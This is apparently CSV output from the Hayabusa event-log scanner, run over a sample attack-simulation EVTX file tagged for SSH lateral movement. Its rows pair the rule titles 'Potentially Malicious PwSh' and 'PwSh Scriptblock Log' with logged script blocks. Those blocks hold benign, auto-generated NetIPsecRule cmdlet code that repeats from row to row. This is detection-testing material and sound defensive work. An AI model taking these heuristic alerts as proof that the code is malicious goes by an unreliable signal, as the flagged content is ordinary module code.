[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 